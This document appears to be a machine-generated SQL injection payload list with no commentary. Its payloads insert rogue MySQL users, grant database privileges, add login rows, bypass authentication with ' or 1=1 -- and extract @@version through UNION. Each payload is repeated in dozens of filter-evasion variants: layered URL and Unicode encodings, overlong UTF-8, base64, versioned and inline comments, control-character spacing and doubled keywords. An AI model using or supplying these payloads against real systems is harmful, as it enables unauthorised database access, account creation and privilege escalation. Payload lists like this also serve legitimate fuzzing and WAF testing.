%2527%2520%2569%256E%2573%2565%2572%2574%2520%2569%256E%2574%256F%2520%256D%2579%2573%2571%256C%252E%2575%2573%2565%2572%2520%2528%2575%2573%2565%2572%252C%2520%2568%256F%2573%2574%252C%2520%2570%2561%2573%2573%2577%256F%2572%2564%2529%2520%2576%2561%256C%2575%2565%2573%2520%2528%2527%256E%2561%256D%2565%2527%252C%2520%2527%256C%256F%2563%2561%256C%2568%256F%2573%2574%2527%252C%2520%2570%2561%2573%2573%2577%256F%2572%2564%2528%2527%2570%2561%2573%2573%2531%2532%2533%2527%2529%2529%2520%252D%252D%250A
%27%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%6D%79%73%71%6C%2E%75%73%65%72%20%28%75%73%65%72%2C%20%68%6F%73%74%2C%20%70%61%73%73%77%6F%72%64%29%20%76%61%6C%75%65%73%20%28%27%6E%61%6D%65%27%2C%20%27%6C%6F%63%61%6C%68%6F%73%74%27%2C%20%70%61%73%73%77%6F%72%64%28%27%70%61%73%73%31%32%33%27%29%29%20%2D%2D%0A
%u0027%u0020%u0069%u006E%u0073%u0065%u0072%u0074%u0020%u0069%u006E%u0074%u006F%u0020%u006D%u0079%u0073%u0071%u006C%u002E%u0075%u0073%u0065%u0072%u0020%u0028%u0075%u0073%u0065%u0072%u002C%u0020%u0068%u006F%u0073%u0074%u002C%u0020%u0070%u0061%u0073%u0073%u0077%u006F%u0072%u0064%u0029%u0020%u0076%u0061%u006C%u0075%u0065%u0073%u0020%u0028%u0027%u006E%u0061%u006D%u0065%u0027%u002C%u0020%u0027%u006C%u006F%u0063%u0061%u006C%u0068%u006F%u0073%u0074%u0027%u002C%u0020%u0070%u0061%u0073%u0073%u0077%u006F%u0072%u0064%u0028%u0027%u0070%u0061%u0073%u0073%u0031%u0032%u0033%u0027%u0029%u0029%u0020%u002D%u002D%u000A
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' /*!30961insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) */--

' /*!00000insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) */--

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' INSERINSERTT into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

%C0%AF%C0%AAinsert%C0%AAinto%C0%AAmysql%C0%AEuser%C0%AA%C0%AAuser%C0%AE%C0%AAhost%C0%AE%C0%AApassword%C0%AB%C0%AAvalues%C0%AA%C0%AA%C0%AFname%C0%AF%C0%AE%C0%AA%C0%AFlocalhost%C0%AF%C0%AE%C0%AApassword%C0%AA%C0%AFpass123%C0%AF%C0%AB%C0%AB%C0%AA%C0%AF%C0%AF%C0%8A
%' %i%n%s%e%r%t %i%n%t%o %m%y%s%q%l%.%u%s%e%r %(%u%s%e%r%, %h%o%s%t%, %p%a%s%s%w%o%r%d%) %v%a%l%u%e%s %(%'%n%a%m%e%'%, %'%l%o%c%a%l%h%o%s%t%'%, %p%a%s%s%w%o%r%d%(%'%p%a%s%s%1%2%3%'%)%) %-%-%

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
 and '0having'='0having'
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
-- sp_password
'/**/insert/**/into/**/mysql.user/**/(user,/**/host,/**/password)/**/values/**/('name',/**/'localhost',/**/password('pass123'))/**/--

'--hPHKokfWTXt%0Ainsert--RNUzuP%0Ainto--FDXEVSscAIpH%0Amysql.user--hDTpchcMLv%0A(user,--GHHUkyeZmhm%0Ahost,--zIYOYufa%0Apassword)--vvyLxyBL%0Avalues--noaPZHtI%0A('name',--eiFheMDs%0A'localhost',--inCNThgWzb%0Apassword('pass123'))--BYrGlSj%0A----wwWIBHEouSkV%0A
'%23LoPrBupMDqWI%0Ainsert%23NTtEhVFLrN%0Ainto%23UBMCQuqo%0Amysql.user%23XZWvLxzhz%0A(user,%23dXLVmWsGYx%0Ahost,%23TmJxCi%0Apassword)%23pFdCNdOi%0Avalues%23zOaNIeYRr%0A('name',%23kRjQFmUWR%0A'localhost',%23vIEanyYsmF%0Apassword('pass123'))%23iCIwVXmPjPG%0A--%23LPPcqOjuw%0A
'%23xDWXHmYsiYI%0Ainsert%23sJoHqqOLc%0Ainto%23zNEWlqEPFFER%0Amysql.user%23KVFIWyqwl%0A(user,%23kIKrNuXm%0Ahost,%23ZvgQZdbZFb%0Apassword)%23gdaeuz%0Avalues%23ViBxRK%0A('name',%23wbwWxZb%0A'localhost',%23PpZZZpo%0Apassword('pass123'))%23wAtKid%0A--%23YNinbx%0A
'%09insert%0Dinto%09mysql.user%02(user,%05host,%0Fpassword)%0Evalues%03('name',%05'localhost',%0Fpassword('pass123'))%08--

'%23%0Ainsert%23%0Ainto%23%0Amysql.user%23%0A(user,%23%0Ahost,%23%0Apassword)%23%0Avalues%23%0A('name',%23%0A'localhost',%23%0Apassword('pass123'))%23%0A--%23%0A
'%0Ainsert%09into%0Bmysql.user%0A(user,%09host,%0Bpassword)%0Cvalues%0D('name',%0B'localhost',%09password('pass123'))%0C--

'--%0Ainsert--%0Ainto--%0Amysql.user--%0A(user,--%0Ahost,--%0Apassword)--%0Avalues--%0A('name',--%0A'localhost',--%0Apassword('pass123'))--%0A----%0A
'+insert+into+mysql.user+(user,+host,+password)+values+('name',+'localhost',+password('pass123'))+--

'%0Ainsert%0Ainto%0Amysql.user%0A(user,%0Ahost,%09password)%0Avalues%0D('name',%0C'localhost',%09password('pass123'))%0C--

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

%bf%27 insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

%EF%BC%87 grant connect to name; grant resource to name; --

%00%27 grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --
%00
JyBncmFudCBjb25uZWN0IHRvIG5hbWU7IGdyYW50IHJlc291cmNlIHRvIG5hbWU7IC0tCg==
' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

%2527%2520%2567%2572%2561%256E%2574%2520%2563%256F%256E%256E%2565%2563%2574%2520%2574%256F%2520%256E%2561%256D%2565%253B%2520%2567%2572%2561%256E%2574%2520%2572%2565%2573%256F%2575%2572%2563%2565%2520%2574%256F%2520%256E%2561%256D%2565%253B%2520%252D%252D%250A
%27%20%67%72%61%6E%74%20%63%6F%6E%6E%65%63%74%20%74%6F%20%6E%61%6D%65%3B%20%67%72%61%6E%74%20%72%65%73%6F%75%72%63%65%20%74%6F%20%6E%61%6D%65%3B%20%2D%2D%0A
%u0027%u0020%u0067%u0072%u0061%u006E%u0074%u0020%u0063%u006F%u006E%u006E%u0065%u0063%u0074%u0020%u0074%u006F%u0020%u006E%u0061%u006D%u0065%u003B%u0020%u0067%u0072%u0061%u006E%u0074%u0020%u0072%u0065%u0073%u006F%u0075%u0072%u0063%u0065%u0020%u0074%u006F%u0020%u006E%u0061%u006D%u0065%u003B%u0020%u002D%u002D%u000A
' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' /*!30618grant connect to name; grant resource to name; */--

' /*!00000grant connect to name; grant resource to name; */--

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

%C0%AF%C0%AAgrant%C0%AAconnect%C0%AAto%C0%AAname%C0%BB%C0%AAgrant%C0%AAresource%C0%AAto%C0%AAname%C0%BB%C0%AA%C0%AF%C0%AF%C0%8A
%' %g%r%a%n%t %c%o%n%n%e%c%t %t%o %n%a%m%e%; %g%r%a%n%t %r%e%s%o%u%r%c%e %t%o %n%a%m%e%; %-%-%

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --
 and '0having'='0having'
' grant connect to name; grant resource to name; --
-- sp_password
'/**/grant/**/connect/**/to/**/name;/**/grant/**/resource/**/to/**/name;/**/--

'--ggPINiwEIw%0Agrant--aYrNdBYRZ%0Aconnect--rNFzXuNXAgr%0Ato--jmejlcAwI%0Aname;--oGFLtS%0Agrant--zIYkGBc%0Aresource--HydRpBdctV%0Ato--vpRXjN%0Aname;--aYTUgNBp%0A----NJhvHuNgqYt%0A
'%23bnSprDrBEa%0Agrant%23FIJOBtwmb%0Aconnect%23unAXnk%0Ato%23QicZLBGI%0Aname;%23KAnXCzRhBlJX%0Agrant%23SdlAAMeFt%0Aresource%23LoRdEzaL%0Ato%23QnUjhk%0Aname;%23IgTESD%0A--%23UNHPlJhSC%0A
'%23mpIYag%0Agrant%23xOiRyuyGxn%0Aconnect%23hntTphrcL%0Ato%23SelrDHyXbkuX%0Aname;%23oYEufR%0Agrant%23RWzZMMem%0Aresource%23xHNDAEHja%0Ato%23nDYyyhXyPOFn%0Aname;%23oGKsgaer%0A--%23srcjpSSY%0A
'%0Agrant%09connect%0Fto%06name;%01grant%05resource%06to%08name;%0C--

'%23%0Agrant%23%0Aconnect%23%0Ato%23%0Aname;%23%0Agrant%23%0Aresource%23%0Ato%23%0Aname;%23%0A--%23%0A
'%0Dgrant%0Dconnect%0Dto%0Cname;%0Cgrant%09resource%0Cto%09name;%0A--

'--%0Agrant--%0Aconnect--%0Ato--%0Aname;--%0Agrant--%0Aresource--%0Ato--%0Aname;--%0A----%0A
'+grant+connect+to+name;+grant+resource+to+name;+--

'%0Dgrant%0Cconnect%0Dto%0Aname;%0Dgrant%0Dresource%0Cto%09name;%09--

' grant connect to name; grant resource to name; --

%bf%27 grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

' grant connect to name; grant resource to name; --

%EF%BC%87 insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

%00%27 insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
%00
JyBpbnNlcnQgaW50byB1c2Vycyhsb2dpbiwgcGFzc3dvcmQsIGxldmVsKSB2YWx1ZXMoIGNoYXIoMHg3MCkgKyBjaGFyKDB4NjUpICsgY2hhcigweDc0KSArIGNoYXIoMHg2NSkgKyBjaGFyKDB4NzIpICsgY2hhcigweDcwKSArIGNoYXIoMHg2NSkgKyBjaGFyKDB4NzQpICsgY2hhcigweDY1KSArIGNoYXIoMHg3MiksY2hhcigweDY0KQo=
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

%2527%2520%2569%256E%2573%2565%2572%2574%2520%2569%256E%2574%256F%2520%2575%2573%2565%2572%2573%2528%256C%256F%2567%2569%256E%252C%2520%2570%2561%2573%2573%2577%256F%2572%2564%252C%2520%256C%2565%2576%2565%256C%2529%2520%2576%2561%256C%2575%2565%2573%2528%2520%2563%2568%2561%2572%2528%2530%2578%2537%2530%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2536%2535%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2537%2534%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2536%2535%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2537%2532%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2537%2530%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2536%2535%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2537%2534%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2536%2535%2529%2520%252B%2520%2563%2568%2561%2572%2528%2530%2578%2537%2532%2529%252C%2563%2568%2561%2572%2528%2530%2578%2536%2534%2529%250A
%27%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%75%73%65%72%73%28%6C%6F%67%69%6E%2C%20%70%61%73%73%77%6F%72%64%2C%20%6C%65%76%65%6C%29%20%76%61%6C%75%65%73%28%20%63%68%61%72%28%30%78%37%30%29%20%2B%20%63%68%61%72%28%30%78%36%35%29%20%2B%20%63%68%61%72%28%30%78%37%34%29%20%2B%20%63%68%61%72%28%30%78%36%35%29%20%2B%20%63%68%61%72%28%30%78%37%32%29%20%2B%20%63%68%61%72%28%30%78%37%30%29%20%2B%20%63%68%61%72%28%30%78%36%35%29%20%2B%20%63%68%61%72%28%30%78%37%34%29%20%2B%20%63%68%61%72%28%30%78%36%35%29%20%2B%20%63%68%61%72%28%30%78%37%32%29%2C%63%68%61%72%28%30%78%36%34%29%0A
%u0027%u0020%u0069%u006E%u0073%u0065%u0072%u0074%u0020%u0069%u006E%u0074%u006F%u0020%u0075%u0073%u0065%u0072%u0073%u0028%u006C%u006F%u0067%u0069%u006E%u002C%u0020%u0070%u0061%u0073%u0073%u0077%u006F%u0072%u0064%u002C%u0020%u006C%u0065%u0076%u0065%u006C%u0029%u0020%u0076%u0061%u006C%u0075%u0065%u0073%u0028%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0037%u0030%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0036%u0035%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0037%u0034%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0036%u0035%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0037%u0032%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0037%u0030%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0036%u0035%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0037%u0034%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0036%u0035%u0029%u0020%u002B%u0020%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0037%u0032%u0029%u002C%u0063%u0068%u0061%u0072%u0028%u0030%u0078%u0036%u0034%u0029%u000A
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' /*!30796insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
*/
' /*!00000insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
*/
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' ININSERTSERT into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

%C0%AF%C0%AAinsert%C0%AAinto%C0%AAusers%C0%AAlogin%C0%AE%C0%AApassword%C0%AE%C0%AAlevel%C0%AB%C0%AAvalues%C0%AA%C0%AAchar%C0%AA0x70%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x65%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x74%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x65%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x72%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x70%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x65%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x74%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x65%C0%AB%C0%AA%C0%AB%C0%AAchar%C0%AA0x72%C0%AB%C0%AEchar%C0%AA0x64%C0%AB%C0%8A
%' %i%n%s%e%r%t %i%n%t%o %u%s%e%r%s%(%l%o%g%i%n%, %p%a%s%s%w%o%r%d%, %l%e%v%e%l%) %v%a%l%u%e%s%( %c%h%a%r%(%0%x%7%0%) %+ %c%h%a%r%(%0%x%6%5%) %+ %c%h%a%r%(%0%x%7%4%) %+ %c%h%a%r%(%0%x%6%5%) %+ %c%h%a%r%(%0%x%7%2%) %+ %c%h%a%r%(%0%x%7%0%) %+ %c%h%a%r%(%0%x%6%5%) %+ %c%h%a%r%(%0%x%7%4%) %+ %c%h%a%r%(%0%x%6%5%) %+ %c%h%a%r%(%0%x%7%2%)%,%c%h%a%r%(%0%x%6%4%)%

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
 and '0having'='0having'
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
-- sp_password
'/**/insert/**/into/**/users(login,/**/password,/**/level)/**/values(/**/char(0x70)/**/+/**/char(0x65)/**/+/**/char(0x74)/**/+/**/char(0x65)/**/+/**/char(0x72)/**/+/**/char(0x70)/**/+/**/char(0x65)/**/+/**/char(0x74)/**/+/**/char(0x65)/**/+/**/char(0x72),char(0x64)

'--zEfrMbHIgM%0Ainsert--NxFpYbTXC%0Ainto--OZRmDHEMiM%0Ausers(login,--UTsqEEd%0Apassword,--nfeqji%0Alevel)--ZPQdOGIR%0Avalues(--hskxbCLeUtK%0Achar(0x70)--dNaBtDtkUI%0A+--fwHfaAzDM%0Achar(0x65)--yDAXywfT%0A+--LFxpJIT%0Achar(0x74)--CSYmnQGzPHdr%0A+--uZEeQiQmebwU%0Achar(0x65)--ykwsQTJsMGh%0A+--sNfqCAEKvj%0Achar(0x72)--oYKfSNOfnQQc%0A+--GcQHPbezLmW%0Achar(0x70)--DvYOkLi%0A+--DThbWFfdOrCO%0Achar(0x65)--gsRVgcfyQW%0A+--EaUSUAjXPhgf%0Achar(0x74)--YMULkIqSx%0A+--gMtEIC%0Achar(0x65)--DPZROrw%0A+--vXaTWjIexbj%0Achar(0x72),char(0x64)--PpAxEzgt%0A
'%23lQzlIO%0Ainsert%23RmaBHBvoqU%0Ainto%23FGFLDoI%0Ausers(login,%23tiwDEhEcGcG%0Apassword,%23moSwjsYmrYu%0Alevel)%23FiNhsw%0Avalues(%23MhkAWAOfOce%0Achar(0x70)%23CJdtfGA%0A+%23sXOvYKAq%0Achar(0x65)%23ENEAloEvbVlZ%0A+%23KZEcQNhwKfM%0Achar(0x74)%23ybEbkyVO%0A+%23gxINTCleFPre%0Achar(0x65)%23FeLoDI%0A+%23gMtbFVtbXs%0Achar(0x72)%23SbUTQRRiGDSS%0A+%23JsPWSPLCWvV%0Achar(0x70)%23slsVpYgRSrZ%0A+%23lLfhgsoMtw%0Achar(0x65)%23voySHOfZfD%0A+%23UBUnCiRmlJ%0Achar(0x74)%23UavBinNaL%0A+%23UowVLkRgj%0Achar(0x65)%23xhXzJgXHUU%0A+%23EICxvRPMIOc%0Achar(0x72),char(0x64)%23YcSgBI%0A
'%23TZQjLhoZaW%0Ainsert%23CZePeikf%0Ainto%23xvEOOR%0Ausers(login,%23nWTbNHKyf%0Apassword,%23TUJtNpwpDa%0Alevel)%23CTVdfq%0Avalues(%23CtsXMO%0Achar(0x70)%23mxOnESEEjuM%0A+%23ClGcGdGnfiMd%0Achar(0x65)%23cLjwTsgf%0A+%23RIPfwPutzBZS%0Achar(0x74)%23ZQsATztGop%0A+%23YbZsErLx%0Achar(0x65)%23GPWUkrsMkn%0A+%23XKRjsNBm%0Achar(0x72)%23NCimYGUmAs%0A+%23FgTzbh%0Achar(0x70)%23yqnmNYpwEZg%0A+%23hnaqBgf%0Achar(0x65)%23eHGxyfvabuo%0A+%23palAAGH%0Achar(0x74)%23LFDKce%0A+%23oCLAutzN%0Achar(0x65)%23uBsjbdoQWVvl%0A+%23crUnggUi%0Achar(0x72),char(0x64)%23pkvcJygVkY%0A
'%03insert%03into%08users(login,%08password,%0Clevel)%0Cvalues(%08char(0x70)%0F+%04char(0x65)%0E+%06char(0x74)%04+%02char(0x65)%0D+%0Bchar(0x72)%07+%06char(0x70)%04+%08char(0x65)%09+%04char(0x74)%0E+%0Fchar(0x65)%01+%0Cchar(0x72),char(0x64)

'%23%0Ainsert%23%0Ainto%23%0Ausers(login,%23%0Apassword,%23%0Alevel)%23%0Avalues(%23%0Achar(0x70)%23%0A+%23%0Achar(0x65)%23%0A+%23%0Achar(0x74)%23%0A+%23%0Achar(0x65)%23%0A+%23%0Achar(0x72)%23%0A+%23%0Achar(0x70)%23%0A+%23%0Achar(0x65)%23%0A+%23%0Achar(0x74)%23%0A+%23%0Achar(0x65)%23%0A+%23%0Achar(0x72),char(0x64)%23%0A
'%0Cinsert%0Cinto%0Cusers(login,%0Cpassword,%09level)%0Dvalues(%0Achar(0x70)%09+%0Achar(0x65)%0C+%0Bchar(0x74)%0D+%09char(0x65)%0C+%0Bchar(0x72)%0C+%0Dchar(0x70)%0C+%0Cchar(0x65)%0A+%0Cchar(0x74)%0C+%0Dchar(0x65)%09+%0Bchar(0x72),char(0x64)

'--%0Ainsert--%0Ainto--%0Ausers(login,--%0Apassword,--%0Alevel)--%0Avalues(--%0Achar(0x70)--%0A+--%0Achar(0x65)--%0A+--%0Achar(0x74)--%0A+--%0Achar(0x65)--%0A+--%0Achar(0x72)--%0A+--%0Achar(0x70)--%0A+--%0Achar(0x65)--%0A+--%0Achar(0x74)--%0A+--%0Achar(0x65)--%0A+--%0Achar(0x72),char(0x64)--%0A
'+insert+into+users(login,+password,+level)+values(+char(0x70)+++char(0x65)+++char(0x74)+++char(0x65)+++char(0x72)+++char(0x70)+++char(0x65)+++char(0x74)+++char(0x65)+++char(0x72),char(0x64)

'%0Cinsert%0Dinto%0Ausers(login,%0Apassword,%09level)%09values(%0Achar(0x70)%0C+%0Achar(0x65)%0C+%09char(0x74)%0C+%0Cchar(0x65)%0C+%0Cchar(0x72)%0A+%09char(0x70)%0C+%09char(0x65)%0A+%0Achar(0x74)%09+%0Dchar(0x65)%0C+%0Dchar(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

%bf%27 insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

%EF%BC%87 or 1=1 --

%00%27 or 1=1 --

' or 1=1 --
%00
JyBvciAxPTEgLS0K
' or 1 BETWEEN 1 AND 1--

' or 1 LIKE 1 --

%2527%2520%256F%2572%2520%2531%253D%2531%2520%252D%252D%250A
%27%20%6F%72%20%31%3D%31%20%2D%2D%0A
%u0027%u0020%u006F%u0072%u0020%u0031%u003D%u0031%u0020%u002D%u002D%u000A
' or 1=1 --

' or 1 LIKE 1 --

' or 1=1 --

' or 1=1 --

' or 1=1 --

' or 1=1 --

' /*!30179or 1=1 */--

' /*!00000or 1=1 */--

' or 1=1 --

' or 1=1 --

%C0%AF%C0%AAor%C0%AA1%C0%BF1%C0%AA%C0%AF%C0%AF%C0%8A
%' %o%r %1%=%1 %-%-%

' or 1=1 --

' or 1=1 --

' or 1=1 --
 and '0having'='0having'
' or 1=1 --
-- sp_password
'/**/or/**/1=1/**/--

'--gJGNaUjhyBOj%0Aor--MQxdqeoyot%0A1=1--HnHBrBSCC%0A----KhQicDdhTd%0A
'%23xJLSEIOTpzL%0Aor%23KyHZuDVMQJ%0A1=1%23EwuxveVJEyb%0A--%23sKvAmvPUtUN%0A
'%23zlEEbxxyuLUt%0Aor%23LwSeYleAETbW%0A1=1%23pJahycFgzEC%0A--%23upvNplyWfFj%0A
'%06or%0E1=1%0F--

'%23%0Aor%23%0A1=1%23%0A--%23%0A
'%0Aor%091=1%09--

'--%0Aor--%0A1=1--%0A----%0A
'+or+1=1+--

'%0Cor%0A1=1%0A--

' or 1=1 --

%bf%27 or 1=1 --

' or 1=1 --

' or 1=1 --

' or 1=1 --

' or 1=1 --

%EF%BC%87 union (select @@version) --

%00%27 union (select @@version) --

' union (select @@version) --
%00
JyB1bmlvbiAoc2VsZWN0IEBAdmVyc2lvbikgLS0K
' union (select @@version) --

' union (select @@version) --

%2527%2520%2575%256E%2569%256F%256E%2520%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%2520%252D%252D%250A
%27%20%75%6E%69%6F%6E%20%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%20%2D%2D%0A
%u0027%u0020%u0075%u006E%u0069%u006F%u006E%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u0020%u002D%u002D%u000A
' union (select @@version) --

' union (select @@version) --

' union (select @@version) --

' union (select @@version) --

' union (select @@version) --

' union (select @@version) --

' /*!30207union (select @@version) */--

' /*!00000union (select @@version) */--

' union (select @@version) --

' UNIUNIONON (SESELECTLECT @@version) --

%C0%AF%C0%AAunion%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AA%C0%AF%C0%AF%C0%8A
%' %u%n%i%o%n %(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%) %-%-%

' union (select @@version) --

' union (select @@version) --

' union (select @@version) --
 and '0having'='0having'
' union (select @@version) --
-- sp_password
'/**/union/**/(select/**/@@version)/**/--

'--koUGgPbBjvxp%0Aunion--REHPkuSoSUmJ%0A(select--FvLfYTxw%0A@@version)--ofWqRRsNkPs%0A----wNvHbb%0A
'%23hbSmRbHf%0Aunion%23ZcFcuytjjIm%0A(select%23JEclbnW%0A@@version)%23mtuLXANnXdc%0A--%23RpnLdrh%0A
'%23OfdXANBStIL%0Aunion%23fsQjymstW%0A(select%23lVIYKeEfTJc%0A@@version)%23eouJXDwH%0A--%23WOTsZe%0A
'%0Cunion%0B(select%09@@version)%0B--

'%23%0Aunion%23%0A(select%23%0A@@version)%23%0A--%23%0A
'%0Aunion%09(select%0B@@version)%0A--

'--%0Aunion--%0A(select--%0A@@version)--%0A----%0A
'+union+(select+@@version)+--

'%09union%0C(select%0A@@version)%0C--

' union (select @@version) --

%bf%27 union (select @@version) --

' union (select @@version) --

' union (select @@version) --

' union (select @@version) --

